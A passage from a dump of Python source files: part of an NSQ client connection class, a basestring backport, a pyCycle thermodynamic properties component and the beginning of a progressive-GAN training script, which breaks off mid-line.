self.trigger(event.DATA, conn=self, data=data)\n except Exception:\n logger.exception('uncaught exception in data event')\n self._start_read()\n\n def send(self, data):\n self.stream.write(data)\n\n def upgrade_to_tls(self, options=None):\n assert ssl, 'tls_v1 requires Python 2.6+ or Python 2.5 w/ pip install ssl'\n\n # in order to upgrade to TLS we need to *replace* the IOStream...\n #\n # first remove the event handler for the currently open socket\n # so that when we add the socket to the new SSLIOStream below,\n # it can re-add the appropriate event handlers.\n self.io_loop.remove_handler(self.socket.fileno())\n\n opts = {\n 'cert_reqs': ssl.CERT_REQUIRED,\n 'ca_certs': default_ca_certs()\n }\n opts.update(options or {})\n self.socket = ssl.wrap_socket(self.socket, ssl_version=ssl.PROTOCOL_TLSv1,\n do_handshake_on_connect=False, **opts)\n\n self.stream = tornado.iostream.SSLIOStream(self.socket, io_loop=self.io_loop)\n self.stream.set_close_callback(self._socket_close)\n\n # now that the IOStream has been swapped we can kickstart\n # the SSL handshake\n self.stream._do_ssl_handshake()\n\n def upgrade_to_snappy(self):\n assert SnappySocket, 'snappy requires the python-snappy package'\n\n # in order to upgrade to Snappy we need to use whatever IOStream\n # is currently in place (normal or SSL)...\n #\n # first read any compressed bytes the existing IOStream might have\n # already buffered and use that to bootstrap the SnappySocket, then\n # monkey patch the existing IOStream by replacing its socket\n # with a wrapper that will automagically handle compression.\n existing_data = self.stream._consume(self.stream._read_buffer_size)\n self.socket = SnappySocket(self.socket)\n self.socket.bootstrap(existing_data)\n self.stream.socket = self.socket\n\n def upgrade_to_deflate(self):\n # in order to upgrade to DEFLATE we need to use whatever IOStream\n # is currently in place (normal or SSL)...\n #\n # first read any compressed bytes the existing IOStream might have\n # already buffered and use that to bootstrap the DefalteSocket, then\n # monkey patch the existing IOStream by replacing its socket\n # with a wrapper that will automagically handle compression.\n existing_data = self.stream._consume(self.stream._read_buffer_size)\n self.socket = DeflateSocket(self.socket, self.deflate_level)\n self.socket.bootstrap(existing_data)\n self.stream.socket = self.socket\n\n def send_rdy(self, value):\n try:\n self.send(protocol.ready(value))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('failed to send RDY %d' % value, e),\n )\n return False\n self.last_rdy = value\n self.rdy = value\n return True\n\n def _on_connect(self, **kwargs):\n identify_data = {\n 'short_id': self.short_hostname, # TODO remove when deprecating pre 1.0 support\n 'long_id': self.hostname, # TODO remove when deprecating pre 1.0 support\n 'client_id': self.short_hostname,\n 'hostname': self.hostname,\n 'heartbeat_interval': self.heartbeat_interval,\n 'feature_negotiation': True,\n 'tls_v1': self.tls_v1,\n 'snappy': self.snappy,\n 'deflate': self.deflate,\n 'deflate_level': self.deflate_level,\n 'output_buffer_timeout': self.output_buffer_timeout,\n 'output_buffer_size': self.output_buffer_size,\n 'sample_rate': self.sample_rate,\n 'user_agent': self.user_agent\n }\n if self.msg_timeout:\n identify_data['msg_timeout'] = self.msg_timeout\n self.trigger(event.IDENTIFY, conn=self, data=identify_data)\n self.on(event.RESPONSE, self._on_identify_response)\n try:\n self.send(protocol.identify(identify_data))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('failed to bootstrap connection', e),\n )\n\n def _on_identify_response(self, data, **kwargs):\n self.off(event.RESPONSE, self._on_identify_response)\n\n if data == b'OK':\n logger.warning('nsqd version does not support feature netgotiation')\n return self.trigger(event.READY, conn=self)\n\n try:\n data = json.loads(data.decode('utf-8'))\n except ValueError:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.IntegrityError(\n 'failed to parse IDENTIFY response JSON from nsqd - %r' %\n data\n ),\n )\n return\n\n self.trigger(event.IDENTIFY_RESPONSE, conn=self, data=data)\n\n if self.tls_v1 and data.get('tls_v1'):\n self._features_to_enable.append('tls_v1')\n if self.snappy and data.get('snappy'):\n self._features_to_enable.append('snappy')\n if self.deflate and data.get('deflate'):\n self._features_to_enable.append('deflate')\n\n if data.get('auth_required'):\n self._authentication_required = True\n\n if data.get('max_rdy_count'):\n self.max_rdy_count = data.get('max_rdy_count')\n else:\n # for backwards compatibility when interacting with older nsqd\n # (pre 0.2.20), default this to their hard-coded max\n logger.warn('setting max_rdy_count to default value of 2500')\n self.max_rdy_count = 2500\n\n self.on(event.RESPONSE, self._on_response_continue)\n self._on_response_continue(conn=self, data=None)\n\n def _on_response_continue(self, data, **kwargs):\n if self._features_to_enable:\n feature = self._features_to_enable.pop(0)\n if feature == 'tls_v1':\n self.upgrade_to_tls(self.tls_options)\n elif feature == 'snappy':\n self.upgrade_to_snappy()\n elif feature == 'deflate':\n self.upgrade_to_deflate()\n # the server will 'OK' after these conneciton upgrades triggering another response\n return\n\n self.off(event.RESPONSE, self._on_response_continue)\n if self.auth_secret and self._authentication_required:\n self.on(event.RESPONSE, self._on_auth_response)\n self.trigger(event.AUTH, conn=self, data=self.auth_secret)\n try:\n self.send(protocol.auth(self.auth_secret))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('Error sending AUTH', e),\n )\n return\n self.trigger(event.READY, conn=self)\n\n def _on_auth_response(self, data, **kwargs):\n try:\n data = json.loads(data.decode('utf-8'))\n except ValueError:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.IntegrityError(\n 'failed to parse AUTH response JSON from nsqd - %r' % data\n ),\n )\n return\n\n self.off(event.RESPONSE, self._on_auth_response)\n self.trigger(event.AUTH_RESPONSE, conn=self, data=data)\n return self.trigger(event.READY, conn=self)\n\n def _on_data(self, data, **kwargs):\n self.last_recv_timestamp = time.time()\n frame, data = protocol.unpack_response(data)\n if frame == protocol.FRAME_TYPE_MESSAGE:\n self.last_msg_timestamp = time.time()\n self.in_flight += 1\n\n message = protocol.decode_message(data)\n message.on(event.FINISH, self._on_message_finish)\n message.on(event.REQUEUE, self._on_message_requeue)\n message.on(event.TOUCH, self._on_message_touch)\n\n self.trigger(event.MESSAGE, conn=self, message=message)\n elif frame == protocol.FRAME_TYPE_RESPONSE and data == b'_heartbeat_':\n self.send(protocol.nop())\n self.trigger(event.HEARTBEAT, conn=self)\n elif frame == protocol.FRAME_TYPE_RESPONSE:\n self.trigger(event.RESPONSE, conn=self, data=data)\n elif frame == protocol.FRAME_TYPE_ERROR:\n self.trigger(event.ERROR, conn=self, error=protocol.Error(data))\n\n def _on_message_requeue(self, message, backoff=True, time_ms=-1, **kwargs):\n if backoff:\n self.trigger(event.BACKOFF, conn=self)\n else:\n self.trigger(event.CONTINUE, conn=self)\n\n self.in_flight -= 1\n try:\n time_ms = self.requeue_delay * message.attempts * 1000 if time_ms < 0 else time_ms\n self.send(protocol.requeue(message.id, time_ms))\n except Exception as e:\n self.close()\n self.trigger(event.ERROR, conn=self, error=protocol.SendError(\n 'failed to send REQ %s @ %d' % (message.id, time_ms), e))\n\n def _on_message_finish(self, message, **kwargs):\n self.trigger(event.RESUME, conn=self)\n\n self.in_flight -= 1\n try:\n self.send(protocol.finish(message.id))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('failed to send FIN %s' % message.id, e),\n )\n\n def _on_message_touch(self, message, **kwargs):\n try:\n self.send(protocol.touch(message.id))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('failed to send TOUCH %s' % message.id, e),\n )\n"} {"ext": "py", "sha": "1a2ec646960eff1682cce5b130079d8d55d99466", "content": "\"\"\"\r\nAn implementation of the basestring type for Python 3\r\n\r\nExample use:\r\n\r\n>>> s = b'abc'\r\n>>> assert isinstance(s, basestring)\r\n>>> from past.types import str as oldstr\r\n>>> s2 = oldstr(b'abc')\r\n>>> assert isinstance(s2, basestring)\r\n\r\n\"\"\"\r\n\r\nimport sys\r\n\r\nfrom past.utils import with_metaclass, PY2\r\n\r\nif PY2:\r\n str = unicode\r\n\r\nver = sys.version_info[:2]\r\n\r\n\r\nclass BaseBaseString(type):\r\n def __instancecheck__(cls, instance):\r\n return isinstance(instance, (bytes, str))\r\n\r\n def __subclasshook__(cls, thing):\r\n # TODO: What should go here?\r\n raise NotImplemented\r\n\r\n\r\nclass basestring(with_metaclass(BaseBaseString)):\r\n \"\"\"\r\n A minimal backport of the Python 2 basestring type to Py3\r\n \"\"\"\r\n\r\n\r\n__all__ = ['basestring']\r\n"} {"ext": "py", "sha": "1a2ec68c03005c038c6cf0a9646a77ef913b815a", "content": "import numpy as np\n\nfrom openmdao.api import ExplicitComponent\n\nfrom pycycle.constants import P_REF, R_UNIVERSAL_ENG, R_UNIVERSAL_SI, MIN_VALID_CONCENTRATION\n\n\nclass PropsCalcs(ExplicitComponent):\n \"\"\"computes, S, H, Cp, Cv, gamma, given a converged equilibirum mixture\"\"\"\n\n def initialize(self):\n self.options.declare('thermo', desc='thermodynamic data object', recordable=False)\n\n def setup(self):\n\n thermo = self.options['thermo']\n\n self.add_input('T', val=284., units=\"degK\", desc=\"Temperature\")\n self.add_input('P', val=1., units='bar', desc=\"Pressure\")\n self.add_input('n', val=np.ones(thermo.num_prod),\n desc=\"molar concentration of the mixtures, last element is the total molar concentration\")\n self.add_input('n_moles', val=1., desc=\"1/molar_mass for gaseous mixture\")\n\n ne1 = thermo.num_element + 1\n self.add_input('result_T', val=np.ones(ne1),\n desc=\"result of the linear solve for T\", shape=ne1)\n self.add_input('result_P', val=np.ones(ne1),\n desc=\"result of the linear solve for T\", shape=ne1)\n\n self.add_output('h', val=1., units=\"cal/g\", desc=\"enthalpy\")\n self.add_output('S', val=1., units=\"cal/(g*degK)\", desc=\"entropy\")\n self.add_output('gamma', val=1.4, lower=1.0, upper=2.0, desc=\"ratio of specific heats\")\n self.add_output('Cp', val=1., units=\"cal/(g*degK)\", desc=\"Specific heat at constant pressure\")\n self.add_output('Cv', val=1., units=\"cal/(g*degK)\", desc=\"Specific heat at constant volume\")\n self.add_output('rho', val=0.0004, units=\"g/cm**3\", desc=\"density\")\n\n self.add_output('R', val=1., units='(N*m)/(kg*degK)', desc='Specific gas constant')\n # self.deriv_options['check_type'] = \"cs\"\n\n # partial derivs setup\n self.declare_partials('h', ['n', 'T'])\n self.declare_partials('S', ['n', 'T', 'P'])\n self.declare_partials('S', 'n_moles')\n self.declare_partials('Cp', ['n', 'T', 'result_T'])\n self.declare_partials('rho', ['T', 'P', 'n_moles'])\n self.declare_partials('gamma', ['n', 'n_moles', 'T', 'result_T', 'result_P'])\n self.declare_partials('Cv', ['n', 'n_moles', 'T', 'result_T', 'result_P'])\n\n self.declare_partials('R', 'n_moles', val=R_UNIVERSAL_SI)\n\n\n def compute(self, inputs, outputs):\n thermo = self.options['thermo']\n num_prod = thermo.num_prod\n num_element = thermo.num_element\n\n T = inputs['T']\n P = inputs['P']\n result_T = inputs['result_T']\n\n nj = inputs['n'][:num_prod]\n # nj[nj<0] = 1e-10 # ensure all concentrations stay non-zero\n n_moles = inputs['n_moles']\n\n self.dlnVqdlnP = dlnVqdlnP = -1 + inputs['result_P'][num_element]\n self.dlnVqdlnT = dlnVqdlnT = 1 - result_T[num_element]\n\n self.Cp0_T = Cp0_T = thermo.Cp0(T)\n Cpf = np.sum(nj*Cp0_T)\n\n self.H0_T = H0_T = thermo.H0(T)\n self.S0_T = S0_T = thermo.S0(T)\n self.nj_H0 = nj_H0 = nj*H0_T\n\n # Cpe = 0\n # for i in range(0, num_element):\n # for j in range(0, num_prod):\n # Cpe -= thermo.aij[i][j]*nj[j]*H0_T[j]*self.result_T[i]\n # vectorization of this for loop for speed\n Cpe = -np.sum(np.sum(thermo.aij*nj_H0, axis=1)*result_T[:num_element])\n Cpe += np.sum(nj_H0*H0_T) # nj*H0_T**2\n Cpe -= np.sum(nj_H0)*result_T[num_element]\n\n outputs['h'] = np.sum(nj_H0)*R_UNIVERSAL_ENG*T\n\n try:\n val = (S0_T+np.log(n_moles/nj/(P/P_REF)))\n except FloatingPointError:\n P = 1e-5\n val = (S0_T+np.log(n_moles/nj/(P/P_REF)))\n\n\n outputs['S'] = R_UNIVERSAL_ENG * np.sum(nj*val)\n outputs['Cp'] = Cp = (Cpe+Cpf)*R_UNIVERSAL_ENG\n outputs['Cv'] = Cv = Cp + n_moles*R_UNIVERSAL_ENG*dlnVqdlnT**2/dlnVqdlnP\n\n outputs['gamma'] = -1*Cp/Cv/dlnVqdlnP\n\n outputs['rho'] = P/(n_moles*R_UNIVERSAL_SI*T)*100 # 1 Bar is 100 Kpa\n\n outputs['R'] = R_UNIVERSAL_SI*n_moles #(m**3 * Pa)/(mol*degK)\n\n def compute_partials(self, inputs, J):\n\n thermo = self.options['thermo']\n num_prod = thermo.num_prod\n num_element = thermo.num_element\n\n T = inputs['T']\n P = inputs['P']\n nj = inputs['n']\n n_moles = inputs['n_moles']\n result_T = inputs['result_T']\n result_T_last = result_T[num_element]\n result_T_rest = result_T[:num_element]\n\n dlnVqdlnP = -1 + inputs['result_P'][num_element]\n dlnVqdlnT = 1 - result_T_last\n\n Cp0_T = thermo.Cp0(T)\n Cpf = np.sum(nj * Cp0_T)\n\n H0_T = thermo.H0(T)\n S0_T = thermo.S0(T)\n nj_H0 = nj * H0_T\n\n # Cpe = 0\n # for i in range(0, num_element):\n # for j in range(0, num_prod):\n # Cpe -= thermo.aij[i][j]*nj[j]*H0_T[j]*self.result_T[i]\n # vectorization of this for loop for speed\n Cpe = -np.sum(np.sum(thermo.aij * nj_H0, axis=1) * result_T_rest)\n Cpe += np.sum(nj_H0 * H0_T) # nj*H0_T**2\n Cpe -= np.sum(nj_H0) * result_T_last\n\n Cp = (Cpe + Cpf) * R_UNIVERSAL_ENG\n Cv = Cp + n_moles * R_UNIVERSAL_ENG * dlnVqdlnT ** 2 / dlnVqdlnP\n\n dH0_dT = thermo.H0_applyJ(T, 1.)\n dS0_dT = thermo.S0_applyJ(T, 1.)\n dCp0_dT = thermo.Cp0_applyJ(T, 1.)\n sum_nj_R = n_moles*R_UNIVERSAL_SI\n\n drho_dT = P/(sum_nj_R*T**2)*100\n drho_dnmoles = -P/(n_moles**2*R_UNIVERSAL_SI*T)*100\n\n dCpe_dT = 2*np.sum(nj*H0_T*dH0_dT)\n # for i in range(num_element):\n # self.dCpe_dT -= np.sum(aij[i]*nj*self.dH0_dT)*self.result_T[i]\n dCpe_dT -= np.sum(np.sum(thermo.aij*nj*dH0_dT, axis=1)*result_T_rest)\n dCpe_dT -= np.sum(nj*dH0_dT)*result_T_last\n\n dCpf_dT = np.sum(nj*dCp0_dT)\n\n J['h', 'T'] = R_UNIVERSAL_ENG*(np.sum(nj*dH0_dT)*T + np.sum(nj*H0_T))\n J['h', 'n'] = R_UNIVERSAL_ENG*T*H0_T\n\n J['S', 'n'] = R_UNIVERSAL_ENG*(S0_T + np.log(n_moles) - np.log(P/P_REF) - np.log(nj) - 1)\n # zero out any derivs w.r.t trace species\n _trace = np.where(nj <= MIN_VALID_CONCENTRATION+1e-20)\n J['S', 'n'][0, _trace] = 0\n J['S', 'T'] = R_UNIVERSAL_ENG*np.sum(nj*dS0_dT)\n J['S', 'P'] = -R_UNIVERSAL_ENG*np.sum(nj/P)\n J['S', 'n_moles'] = R_UNIVERSAL_ENG*np.sum(nj)/n_moles\n J['rho', 'T'] = -P/(sum_nj_R*T**2)*100\n J['rho', 'n_moles'] = -P/(n_moles**2*R_UNIVERSAL_SI*T)*100\n J['rho', 'P'] = 1/(sum_nj_R*T)*100\n\n dCp_dnj = R_UNIVERSAL_ENG*(Cp0_T + H0_T**2)\n for j in range(num_prod):\n for i in range(num_element):\n dCp_dnj[j] -= R_UNIVERSAL_ENG*thermo.aij[i][j]*H0_T[j]*result_T[i]\n dCp_dnj -= R_UNIVERSAL_ENG * H0_T * result_T_last\n J['Cp', 'n'] = dCp_dnj\n\n dCp_dresultT = np.zeros(num_element+1, dtype=inputs._data.dtype)\n # for i in range(num_element):\n # self.dCp_dresultT[i] = -R_UNIVERSAL_ENG*np.sum(aij[i]*nj_H0)\n dCp_dresultT[:num_element] = -R_UNIVERSAL_ENG*np.sum(thermo.aij*nj_H0, axis=1)\n dCp_dresultT[num_element] = - R_UNIVERSAL_ENG*np.sum(nj_H0)\n J['Cp', 'result_T'] = dCp_dresultT\n\n dCp_dT = (dCpe_dT + dCpf_dT)*R_UNIVERSAL_ENG\n J['Cp', 'T'] = dCp_dT\n\n J['Cv', 'n'] = dCp_dnj\n\n dCv_dnmoles = R_UNIVERSAL_ENG*dlnVqdlnT**2/dlnVqdlnP\n J['Cv', 'n_moles'] = dCv_dnmoles\n J['Cv', 'T'] = dCp_dT\n\n dCv_dresultP = np.zeros((1, num_element+1), dtype=inputs._data.dtype)\n dCv_dresultP[0, -1] = -R_UNIVERSAL_ENG*n_moles*(dlnVqdlnT/dlnVqdlnP)**2\n J['Cv', 'result_P'] = dCv_dresultP\n\n dCv_dresultT = dCp_dresultT.copy()\n dCv_dresultT[-1] -= n_moles*R_UNIVERSAL_ENG/dlnVqdlnP*(2*dlnVqdlnT)\n dCv_dresultT_last = dCv_dresultT[-1]\n J['Cv', 'result_T'] = dCv_dresultT\n\n J['gamma', 'n'] = dCp_dnj*(Cp/Cv-1)/(dlnVqdlnP*Cv)\n J['gamma', 'n_moles'] = Cp/dlnVqdlnP/Cv**2*dCv_dnmoles\n J['gamma', 'T'] = dCp_dT/dlnVqdlnP/Cv*(Cp/Cv-1)\n\n dgamma_dresultT = np.zeros((1, num_element+1), dtype=inputs._data.dtype)\n dgamma_dresultT[0, :num_element] = 1/Cv/dlnVqdlnP*dCp_dresultT[:num_element]*(Cp/Cv-1)\n dgamma_dresultT[0, -1] = (-dCp_dresultT[-1]/Cv+Cp/Cv**2*dCv_dresultT_last)/dlnVqdlnP\n J['gamma', 'result_T'] = dgamma_dresultT\n\n gamma_dresultP = np.zeros((1, num_element+1), dtype=inputs._data.dtype)\n gamma_dresultP[0, num_element] = Cp/Cv/dlnVqdlnP*(dCv_dresultP[0, -1]/Cv + 1/dlnVqdlnP)\n J['gamma', 'result_P'] = gamma_dresultP\n\n\nif __name__ == \"__main__\":\n\n from openmdao.api import Problem, Group, IndepVarComp\n\n from pycycle.cea import species_data\n\n thermo = species_data.Properties(species_data.co2_co_o2)\n\n p = Problem()\n model = p.model = Group()\n\n indeps = model.add_subsystem('indeps', IndepVarComp(), promotes=['*'])\n indeps.add_output('T', 2761.56784655, units='degK')\n indeps.add_output('P', 1.034210, units='bar')\n indeps.add_output('n', val=np.array([2.272e-02, 1.000e-10, 1.136e-02]))\n indeps.add_output('n_moles', val=0.0340831628675)\n\n indeps.add_output('result_T', val=np.array([-3.02990116, 1.95459777, -0.05024694]))\n indeps.add_output('result_P', val=np.array([0.53047724, 0.48627081, -0.00437025]))\n\n model.add_subsystem('calcs', PropsCalcs(thermo=thermo), promotes=['*'])\n\n p.setup()\n p.run_model()\n\n print(\"outputs\")\n print('h', p['h'])\n print('S', p['S'])\n print('gamma', p['gamma'])\n print('Cp', p['Cp'])\n print('Cv', p['Cv'])\n print('rho', p['rho'])\n print()\n print()\n print('############################################')\n\n p.model.run_linearize()\n\n jac = p.model.get_subsystem('calcs').jacobian._subjacs\n for pair in jac:\n print(pair)\n print(jac[pair])\n print\n"} {"ext": "py", "sha": "1a2ec6b2a0c25e3d2a554547acbe2827f6ab03ee", "content": "import numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\n\nimport torch\nfrom torch import nn, optim\nfrom torch.autograd import Variable, grad\nfrom torchvision import utils\n\nfrom model import Generator, Discriminator\n\nfrom datetime import datetime\nimport random\nimport copy\n\nimport os\n\nimport config\nimport utils\nimport data\nimport evaluate\n\nimport torch.backends.cudnn as cudnn\ncudnn.benchmark = True\n\nfrom torch.nn import functional as F\n\nargs = config.get_config()\nwriter = None\n\ndef batch_size(reso):\n if args.gpu_count == 1:\n save_memory = False\n if not save_memory:\n batch_table = {4:128, 8:128, 16:128, 32:64, 64:32, 128:16, 256:8, 512:4, 1024:1}\n else:\n batch_table = {4:128, 8:128, 16:128, 32:32, 64:16, 128:4, 256:2, 512:2, 1024:1}\n elif args.gpu_count == 2:\n batch_table = {4:256, 8:256, 16:256, 32:128, 64:64, 128:32, 256:16, 512:8, 1024:2}\n elif args.gpu_count == 4:\n batch_table = {4:512, 8:256, 16:128, 32:64, 64:32, 128:32, 256:32, 512:16, 1024:4}\n elif args.gpu_count == 8:\n batch_table = {4:512, 8:512, 16:512, 32:256, 64:256, 128:128, 256:64, 512:32, 1024:8}\n else:\n assert(False)\n \n return batch_table[reso]\n\ndef batch_size_by_phase(phase):\n return batch_size(4 * 2 ** phase)\n\nclass Session:\n def __init__(self):\n # Note: 4 requirements for sampling from pre-existing models:\n # 1) Ensure you save and load both multi-gpu versions (DataParallel) or both not.\n # 2) Ensure you set the same phase value as the pre-existing model and that your local and global alpha=1.0 are set\n # 3) Sample from the g_running, not from the latest generator\n # 4) You may need to warm up the g_running by running evaluate.reconstruction_dryrun() first\n\n self.alpha = -1\n self.sample_i = min(args.start_iteration, 0)\n self.phase = args.start_phase\n\n self.generator = nn.DataParallel( Generator(args.nz+1, args.n_label).cuda() )\n self.g_running = nn.DataParallel( Generator(args.nz+1, args.n_label).cuda() )\n self.encoder = nn.DataParallel( Discriminator(nz = args.nz+1, n_label = args.n_label, binary_predictor = args.train_mode == config.MODE_GAN).cuda() )\n\n print(\"Using \", torch.cuda.device_count(), \" GPUs!\")\n\n self.reset_opt()\n\n print('Session created.')\n\n def reset_opt(self):\n self.optimizerG = optim.Adam(self.generator.parameters(), args.lr, betas=(0.0, 0.99))\n self.optimizerD = optim.Adam(self.encoder.parameters(), args.lr, betas=(0.0, 0.99)) # includes all the encoder parameters...\n\n def save_all(self, path):\n torch.save({'G_state_dict': self.generator.state_dict(),\n 'D_state_dict': self.encoder.state_dict(),\n 'G_running_state_dict': self.g_running.state_dict(),\n 'optimizerD': self.optimizerD.state_dict(),\n 'optimizerG': self.optimizerG.state_dict(),\n 'iteration': self.sample_i,\n 'phase': self.phase,\n 'alpha': self.alpha},\n path)\n\n def load(self, path):\n checkpoint = torch.load(path)\n self.sample_i = int(checkpoint['iteration'])\n \n self.generator.load_state_dict(checkpoint['G_state_dict'])\n self.g_running.load_state_dict(checkpoint['G_running_state_dict'])\n self.encoder.load_state_dict(checkpoint['D_state_dict'])\n\n if args.reset_optimizers <= 0:\n self.optimizerD.load_state_dict(checkpoint['optimizerD'])\n self.optimizerG.load_state_dict(checkpoint['optimizerG'])\n print(\"Reloaded old optimizers\")\n else:\n print(\"Despite loading the state, we reset the optimizers.\")\n\n self.alpha = checkpoint['alpha']\n self.phase = int(checkpoint['phase'])\n if args.start_phase > 0: #If the start phase has been manually set, try to actually use it (e.g. when have trained 64x64 for extra rounds and then turning the model over to 128x128)\n self.phase = min(args.start_phase, self.phase)\n print(\"Use start phase: {}\".format(self.phase))\n if self.phase > args.max_phase:\n print('Warning! Loaded model claimed phase {} but max_phase={}'.format(self.phase, args.max_phase))\n self.phase = args.max_phase\n\n def create(self):\n if args.start_iteration <= 0:\n args.start_iteration = 1\n if args.no_progression:\n self.sample_i = args.start_iteration = int( (args.max_phase + 0.5) * args.images_per_stage ) # Start after the fade-in stage of the last iteration\n args.force_alpha = 1.0\n print(\"Progressive growth disabled. Setting start step = {} and alpha = {}\".format(args.start_iteration, args.force_alpha))\n else:\n reload_from = '{}/checkpoint/{}_state'.format(args.save_dir, str(args.start_iteration).zfill(6)) #e.g. '604000' #'600000' #latest' \n print(reload_from)\n if os.path.exists(reload_from):\n self.load(reload_from)\n print(\"Loaded {}\".format(reload_from))\n print(\"Iteration asked {} and got {}\".format(args.start_iteration, self.sample_i)) \n\n if args.testonly:\n self.generator = copy.deepcopy(self.g_running)\n else:\n assert(not args.testonly)\n self.sample_i = args.start_iteration\n print('Start from iteration {}'.format(self.sample_i))\n\n self.g_running.train(False)\n\n if args.force_alpha >= 0.0:\n self.alpha = args.force_alpha\n\n accumulate(self.g_running, self.generator, 0)\n\ndef setup():\n utils.make_dirs()\n if not args.testonly:\n config.log_args(args)\n\n if args.use_TB:\n from dateutil import tz\n from tensorboardX import SummaryWriter\n\n dt = datetime.now(tz.gettz('Europe/Helsinki')).strftime(r\"%y%m%d_%H%M\")\n global writer\n writer = SummaryWriter(\"{}/{}/{}\".format(args.summary_dir, args.save_dir, dt))\n\n random.seed(args.manual_seed)\n torch.manual_seed(args.manual_seed)\n torch.cuda.manual_seed_all(args.manual_seed) \n\ndef accumulate(model1, model2, decay=0.999):\n par1 = dict(model1.named_parameters())\n par2 = dict(model2.named_parameters())\n\n for k in par1.keys():\n par1[k].data.mul_(decay).add_(1 - decay, par2[k].data)\n\ndef get_grad_penalty(discriminator, real_image, fake_image, step, alpha):\n \"\"\" Used in WGAN-GP version only. \"\"\"\n eps = torch.rand(batch_size_by_phase(step), 1, 1, 1).cuda()\n\n if eps.size(0) != real_image.size(0) or eps.size(0) != fake_image.size(0):\n # If end-of-batch situation, we restrict other vectors to matcht the number of training images available.\n eps = eps[:real_image.size(0)]\n fake_image = fake_image[:real_image.size(0)]\n\n x_hat = eps * real_image.data + (1 - eps) * fake_image.data\n x_hat = Variable(x_hat, requires_grad=True)\n\n if args.train_mode == config.MODE_GAN: # Regular GAN mode\n hat_predict, _ = discriminator(x_hat, step, alpha, args.use_ALQ)\n grad_x_hat = grad(\n outputs=hat_predict.sum(), inputs=x_hat, create_graph=True)[0]\n else:\n hat_z = discriminator(x_hat, step, alpha, args.use_ALQ)\n # KL_fake: \\Delta( e(g(Z)) , Z ) -> max_e\n KL_maximizer = KLN01Loss(direction=args.KL, minimize=False)\n KL_fake = KL_maximizer(hat_z) * args.fake_D_KL_scale\n grad_x_hat = grad(\n outputs=KL_fake.sum(), inputs=x_hat, create_graph=True)[0]\n\n # Push the gradients of the interpolated samples towards 1\n grad_penalty = ((grad_x_hat.view(grad_x_hat.size(0), -1)\n .norm(2, dim=1) - 1)**2).mean()\n grad_penalty = 10 * grad_penalty\n return grad_penalty\n\ndef D_prediction_of_G_output(generator, encoder, step, alpha):\n # To use labels, enable here and elsewhere:\n #label = Variable(torch.ones(batch_size_by_phase(step), args.n_label)).cuda()\n # label = Variable(\n # torch.multinomial(\n # torch.ones(args.n_label), args.batch_size, replacement=True)).cuda()\n\n myz = Variable(torch.randn(batch_size_by_phase(step), args.nz)).cuda(non_blocking=(args.gpu_count>1))\n myz = utils.normalize(myz)\n myz, label = utils.split_labels_out_of_latent(myz)\n\n fake_image = generator(myz, label, step, alpha)\n fake_predict, _ = encoder(fake_image, step, alpha, args.use_ALQ)\n\n loss = fake_predict.mean()\n return loss, fake_image\n\nclass KLN01Loss(torch.nn.Module): #Adapted from https://github.com/DmitryUlyanov/AGE\n\n def __init__(self, direction, minimize):\n super(KLN01Loss, self).__init__()\n self.minimize = minimize\n assert direction in ['pq', 'qp'], 'direction?'\n\n self.direction = direction\n\n def forward(self, samples):\n\n assert samples.nelement() == samples.size(1) * samples.size(0), '?'\n\n samples = samples.view(samples.size(0), -1)\n\n self.samples_var = utils.var(samples)\n self.samples_mean = samples.mean(0)\n\n samples_mean = self.samples_mean\n samples_var = self.samples_var\n\n if self.direction == 'pq':\n t1 = (1 + samples_mean.pow(2)) / (2 * samples_var.pow(2))\n t2 = samples_var.log()\n\n KL = (t1 + t2 - 0.5).mean()\n else:\n # In the AGE implementation, there is samples_var^2 instead of samples_var^1\n t1 = (samples_var + samples_mean.pow(2)) / 2\n # In the AGE implementation, this did not have the 0.5 scaling factor:\n t2 = -0.5*samples_var.log()\n\n KL = (t1 + t2 - 0.5).mean()\n\n if not self.minimize:\n KL *= -1\n\n return KL\n\ndef train(generator, encoder, g_running, train_data_loader, test_data_loader, session, total_steps, train_mode):\n pbar = tqdm(initial=session.sample_i, total = total_steps)\n \n benchmarking = False\n \n match_x = args.match_x\n generatedImagePool = None\n\n refresh_dataset = True\n refresh_imagePool = True\n\n # After the Loading stage, we cycle through successive Fade-in and Stabilization stages\n\n batch_count = 0\n\n reset_optimizers_on_phase_start = False\n\n # TODO Unhack this (only affects the episode count statistics anyway):\n if args.data != 'celebaHQ':\n epoch_len = len(train_data_loader(1,4).dataset)\n else:\n epoch_len = train_data_loader._len['data4x4']\n\n if args.step_offset != 0:\n if args.step_offset == -1:\n args.step_offset = session.sample_i\n print(\"Step offset is {}\".format(args.step_offset))\n session.phase += args.phase_offset\n session.alpha = 0.0\n\n while session.sample_i < total_steps:\n ####################### Phase Maintenance ####################### \n\n steps_in_previous_phases = max(session.phase * args.images_per_stage, args.step_offset)\n\n sample_i_current_stage = session.sample_i - steps_in_previous_phases\n\n # If we can move to the next phase\n if sample_i_current_stage >= args.images_per_stage:\n if session.phase < args.max_phase: # If any phases left\n iteration_levels = int(sample_i_current_stage / args.images_per_stage)\n session.phase += iteration_levels\n sample_i_current_stage -= iteration_levels * args.images_per_stage\n match_x = args.match_x # Reset to non-matching phase\n print(\"iteration B alpha={} phase {} will be reduced to 1 and [max]\".format(sample_i_current_stage, session.phase))\n\n refresh_dataset = True\n refresh_imagePool = True # Reset the pool to avoid images of 2 different resolutions in the pool\n\n if reset_optimizers_on_phase_start:\n utils.requires_grad(generator)\n utils.requires_grad(encoder)\n generator.zero_grad()\n encoder.zero_grad()\n session.reset_opt()\n print(\"Optimizers have been reset.\") \n\n reso = 4 * 2 ** session.phase\n\n # If we can switch from fade-training to stable-training\n if sample_i_current_stage >= args.images_per_stage/2:\n if session.alpha < 1.0:\n refresh_dataset = True # refresh dataset generator since no longer have to fade\n match_x = args.match_x * args.matching_phase_x\n else:\n match_x = args.match_x\n\n session.alpha = min(1, sample_i_current_stage * 2.0 / args.images_per_stage) # For 100k, it was 0.00002 = 2.0 / 